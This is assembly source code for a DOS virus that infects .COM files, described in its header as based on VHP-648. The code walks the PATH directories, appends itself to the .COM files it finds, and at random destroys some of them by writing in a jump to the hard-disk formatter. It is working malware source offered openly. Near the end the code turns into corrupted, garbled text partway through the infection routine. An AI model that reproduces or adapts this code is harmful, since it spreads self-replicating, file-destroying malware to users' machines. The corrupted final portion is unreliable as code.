name Virus title Virus; based on the famous VHP-648 virus .radix 16 code segment assume cs:code,ds:code org 100 environ equ 2C start: jmp virus int 20 data label byte ;Data section dtaaddr dd ? ;Disk Transfer Address ftime dw ? ;File date fdate dw ? ;File time fattrib dw ? ;File attribute saveins db 3 dup (90) ;Original first 3 bytes newjmp db 0E9 ;Code of jmp instruction codeptr dw ? ;Here is formed a jump to virus code allcom db '*.COM',0 ;Filespec to search for poffs dw ? ;Address of 'PATH' string eqoffs dw ? ;Address of '=' sign pathstr db 'PATH=' fname db 40 dup (' ') ;Path name to search for ;Disk Transfer Address for Find First / Find Next: mydta label byte drive db ? ;Drive to search for pattern db 13d dup (?) ;Search pattern reserve db 7 dup (?) ;Not used attrib db ? ;File attribute time dw ? ;File time date dw ? ;File date fsize dd ? ;File size namez db 13d dup (?) ;File name found ;This replaces the first instruction of a destroyed file. ;It's a jmp instruction into the hard disk formatting program (IBM XT only): bad_jmp db 0EA,0,0,0,0C8 errhnd dd ? virus: push cx ;Save CX mov dx,offset data ;Restore original first instruction modify equ $-2 ;The instruction above is changed ; before each contamination cld mov si,dx add si,saveins-data ;Instruction saved there mov di,offset start mov cx,3 ;Move 3 bytes rep movsb ;Do it mov si,dx ;Keep SI pointed at data mov ah,30 ;Get DOS version int 21 cmp al,0 ;Less than 2.0? jne skip1 jmp exit ;Exit if so skip1: push es ;Save ES mov ah,2F ;Get current DTA in ES:BX int 21 mov [si+dtaaddr-data],bx ;Save it in dtaaddr mov [si+dtaaddr+2-data],es mov ax,3524 ;Get interrupt 24h handler int 21 ; and save it in errhnd mov [si+errhnd-data],bx mov [si+errhnd+2-data],es pop es ;Restore ES mov ax,2524 ;Set interrupt 24h handler mov dx,si add dx,handler-data int 21 mov dx,mydta-data add dx,si mov ah,1A ;Set DTA int 21 push es ;Save ES & SI push si mov es,ds:[environ] ;Environment address xor di,di n_00015A: ;Search 'PATH' in environment pop si ;Restore data offset in SI push si add si,pathstr-data lodsb mov cx,8000 ;Maximum 32K in environment repne scasb ;Search for first letter ('P') mov cx,4 ;4 letters in 'PATH' n_000169: lodsb ;Search for next char scasb jne n_00015A ;If not found, search for next 'P' loop n_000169 ;Loop until done pop si ;Restore SI & ES pop es mov [si+poffs-data],di ;Save 'PATH' offset in poffs mov bx,si ;Point BX at data area add si,fname-data ;Point SI & DI at fname mov di,si jmp short n_0001BF n_000185: cmp word ptr [si+poffs-data],6C jne n_00018F jmp olddta n_00018F: push ds push si mov ds,es:[environ] mov di,si mov si,es:[di+poffs-data] add di,fname-data n_0001A1: lodsb cmp al,';' je n_0001B0 cmp al,0 je n_0001AD stosb jmp n_0001A1 n_0001AD: xor si,si n_0001B0: pop bx pop ds mov [bx+poffs-data],si cmp byte ptr [di-1],'\' je n_0001BF mov al,'\' ;Add '\' if not already present stosb n_0001BF: mov [bx+eqoffs-data],di ;Save '=' offset in eqoffs mov si,bx ;Restore data pointer in SI add si,allcom-data mov cl,6 ;6 bytes in ASCIIZ '*.COM' rep movsb ;Move '*.COM' at fname mov si,bx ;Restore SI mov ah,4E ;Find first file mov dx,fname-data add dx,si mov cl,11b ;Hidden, Read/Only or Normal files int 21 jmp short n_0001E3 findnext: mov ah,4F ;Find next file int 21 n_0001E3: jnc n_0001E7 ;If found, try to contaminate it jmp n_000185 ;Otherwise search in another directory n_0001E7: mov ax,[si+time-data] ;Check file time and al,11111b ; (the seconds, more exactly) cmp al,62d/2 ;Are they 62? ;If so, file is already contains the virus, search for another: je findnext ;Is file size greather than 64,000 bytes? cmp [si+fsize-data],64000d ja findnext ;If so, search for next file ;Is file size less than 10 bytes? cmp word ptr [si+fsize-data],10d jb findnext ;If so, search for next file mov di,[si+eqoffs-data] push si ;Save SI add si,namez-data ;Point SI at namez n_000209: lodsb stosb cmp al,0 jne n_000209 pop si ;Restore SI mov ax,4300 ;Get file attributes mov dx,fname-data add dx,si int 21 mov [si+fattrib-data],cx ;Save them in fattrib mov ax,4301 ;Set file attributes and cl,not 1 ;Turn off Read Only flag int 21 mov ax,3D02 ;Open file with Read/Write access int 21 jnc n_00023E jmp oldattr ;Exit on error n_00023E: mov bx,ax ;Save file handle in BX mov ax,5700 ;Get file date & time int 21 mov [si+ftime-data],cx ;Save time in ftime mov [si+fdate-data],dx ;Save date in fdate mov ah,2C ;Get system time int 21 and dh,111b ;Are seconds a multiple of 8? jnz n_000266 ;If not, contaminate file (don't destroy): ;Destroy file by rewriting an illegal jmp as first instruction: mov ah,40 ;Write to file handle mov cx,5 ;Write 5 bytes mov dx,si add dx,bad_jmp-data ;Write THESE bytes int 21 ;Do it jmp short oldtime ;Exit ;Try to contaminate file: ;Read first instruction of the file (first 3 bytes) and save it in saveins: n_000266: mov ah,3F ;Read from file handle mov cx,3 ;Read 3 bytes mov dx,saveins-data ;Put them there add dx,si int 21 jc oldtime ;Exit on error cmp ax,3 ;Are really 3 bytes read? jne oldtime ;Exit if not ;Move file pointer to end of file: mov ax,4202 ;LSEEK from end of file xor cx,cx ;0 bytes from end xor dx,dx int 21 jc oldtime ;Exit on error mov cx,ax ;Get the value of file pointer (file size) add ax,virus-data-3 ;Add virus data length to get code offset mov [si+codeptr-data],ax ;Save result in codeptr inc ch ;Add 100h to CX mov di,si add di,modify-data ;A little self-modification mov [di],cx mov ah,40 ;Write to file handle mov cx,endcode-data ;Virus code length as bytes to be written mov dx,si ;Write from data to endcode int 21 jc oldtime ;Exit on error cmp ax,endcode-data ;Are all bytes written? jne oldtime ;Exit if not mov ax,4200 ;LSEEK from the beginning of the file xor cx,cx ;Just at the file beginning xor dx,dx int 21 jc oldtime ;Exit on error ;Rewrite the first instruction of the file ate-dne bove ata area adttttttt grrr frrrrrrt: mov ah,4Frrrrrrrrrrre EPpll zDstrrrrrr e ata area adttttttt grrr g1r1rH)a0x,2524 a0me l eO3Efleqryc+qn_00dd si,d ont 21 jc oldtime ;Exit on error cmp me l eO3E*; conds, more exa mov ahop ssi,d ont 21 G3,n'0exit ;Exit if i bl eO3Efleq n_0001A1: lods01: Tn v ax,vitrtvs,pathstrt rp tore SI ff to enaMvall byly ont 21 jc ?i eO3js mar it vall bylit vall tfll etan rE ax,[di+poffs-datat conds,lodsblit )Eo :b; eO3Eeax ;Get the value of file pointer (f mar file xor'artvs,papoinre to file hand ;n written? jenaMoS wi,edO3E*;cog1ll byly ont 2ijc oltfll etan rnax,4CSave 'n,X cs,papa tss a font ah,4E ,Nt5h enaMoS wta 'p ax,c olhem in Kpto file hand ;n writc file ;o dleptrle han yc+qnlile xor'artvsd ;nCcfont n v ae od mo ldfile le hh znt S wi, d rt2